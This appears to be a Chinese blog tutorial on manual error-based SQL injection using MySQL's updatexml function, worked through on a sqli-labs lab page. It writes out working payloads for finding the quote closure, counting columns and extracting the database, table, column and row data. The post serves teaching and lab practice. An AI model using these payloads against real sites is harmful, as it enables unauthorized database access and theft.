首页 > 其他分享 >【手工注入篇】updatexml报错注入

【手工注入篇】updatexml报错注入

时间:2023-11-12 21:37:16浏览次数:37  
标签:-- 报错 updatexml id concat 注入

一、描述

updatexml(xml_target, xpath_expr, new_val)

  • xml_target:要进行修改的 XML 类型的字段,或者是 XML 文档字符串。
  • xpath_expr:XPath 表达式,用于定位要更新的节点。
  • new_val:新的值,用于替换被定位到的节点的内容。

格式简化 updatexml(xx,concat(xx),xx)

concat函数用来拼接字符

把第二个参数改为非xpath格式 就会报错 但报错的信息是什么呢?

他会把校验失败的数据爆出来

第一个和第二个参数可以随便写 因为我们需要的是第二个参数的报错信息

二、做题

http://14.116.152.57:5100/Less-5/

1、判断类型

?id=1 and 1=1

?id=1 and 1=2

2、判断注入类型
?id=1" and 1=1
?id=1' and 1=2

 经过分析该场景为字符型注入

构造闭合

?id=1' and 1=1 -- q

 

查询字段数、
?id=1' order by 1 -- q

?id=1' order by 2 -- q

?id=1' order by 3 -- q

?id=1' order by 4 -- q

显位

?id=88' union select 1,2,3 -- q

 无法识别

 

发现即使调整了id的值 并没有产生回显点

没有显错位的注入 可以考虑从盲注入手

但这里先不采用盲注 用另一种报错信息方式updatexml来回显

3、updatexml报错

爆库
?id=1' and 1=1 and updatexml(1,concat('!',database(),'!'),1) -- q

 

爆表
?id=1' and 1=1 and updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema="security" limit 0,1),'!'),1) -- q

爆列
?id=1' and 1=1 and updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1) -- q

爆值
?id=1' and 1=1 and updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1) -- q

 

标签:--,报错,updatexml,id,concat,注入
From: https://www.cnblogs.com/xfbk/p/17827884.html

相关文章

  • cc1: all warnings being treated as errors报错处理
    cmake时一切正常,make时产生了报错,并且解释为`cc1:allwarningsbeingtreatedaserrors`一些网上的方法是在Makefile文件里删除`-Werror`,但我的Makefile文件不存在这个选项。我的解决方法:在CMakeLists里寻找配置'-Werror'的语句,将这些涉及的语句删除。并且删除之前cmake......
  • 解决vue-element-admin安装报错npm ERR! code 128
    在安装vue-element-admin的npminstall的时候报错npmERR!code128npmERR!AnunknowngiterroroccurrednpmERR!commandgit--no-replace-objectsls-remotessh://[email protected]/nhn/[email protected]:Permissiondenied(publickey).npmERR!fatal:......
  • 虚拟机下载redis时使用make命令报错
    问题描述使用make命令编译redis时,发现这里一直报错~~问题解决先下载c++编译器:yum-yinstallgcc-c++我是又重新解压了文件,再次使用make命令,就ok啦~......
  • chatgpt的api联网报错问题解决:openai公司的api联网报错解决
    chatgpt是啥,这里不讲,openai是啥这里也不讲。要知道我们不论是通过网页web使用chatgpt还是使用api方式通过客户端使用chatgpt都是需要使用外国IP的,     ......
  • mysql ssh隧道连接数据库报错
    1.ssh隧道连接数据库报错:80070007:SSHTunnel:Serverdoesnotsupportdiffie-hellman-group1-sha1forkeyexchange①./etc/ssh/sshd_config最下面加入下面配置:KexAlgorithmsdiffie-hellman-group1-sha1,[email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp3......
  • ThinkPHP5漏洞分析之SQL注入1
    漏洞概要本次漏洞存在于Builder类的parseData方法中。由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:5.0.13<=ThinkPHP<=5.0.15、5.1.0<=ThinkPHP<=5.1.5。漏洞环境通过以下命令获取测试环境代码:composercreate-proje......
  • ThinkPHP5漏洞分析之SQL注入2
    漏洞概要本次漏洞存在于Mysql类的parseArrayData方法中由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:5.1.6<=ThinkPHP<=5.1.7(非最新的5.1.8版本也可利用)。漏洞环境通过以下命令获取测试环境代码:composercreate-pro......
  • ThinkPHP5漏洞分析之SQL注入3
    漏洞概要本次漏洞存在于Mysql类的parseWhereItem方法中。由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:ThinkPHP5全版本。漏洞环境通过以下命令获取测试环境代码:composercreate-project--prefer-disttopthink/think=......
  • ThinkPHP5漏洞分析之SQL注入4
    漏洞概要本次漏洞存在于Mysql类的parseWhereItem方法中。由于程序没有对数据进行很好的过滤,直接将数据拼接进SQL语句。再一个,Request类的filterValue方法漏过滤NOTLIKE关键字,最终导致SQL注入漏洞的产生。漏洞影响版本:ThinkPHP=5.0.10。漏洞环境通过以下命令获......
  • ThinkPHP5漏洞分析之SQL注入5
    漏洞概要本次漏洞存在于Builder类的parseOrder方法中。由于程序没有对数据进行很好的过滤,直接将数据拼接进SQL语句,最终导致SQL注入漏洞的产生。漏洞影响版本:5.1.16<=ThinkPHP5<=5.1.22。漏洞环境通过以下命令获取测试环境代码:composercreate-project--prefer-dist......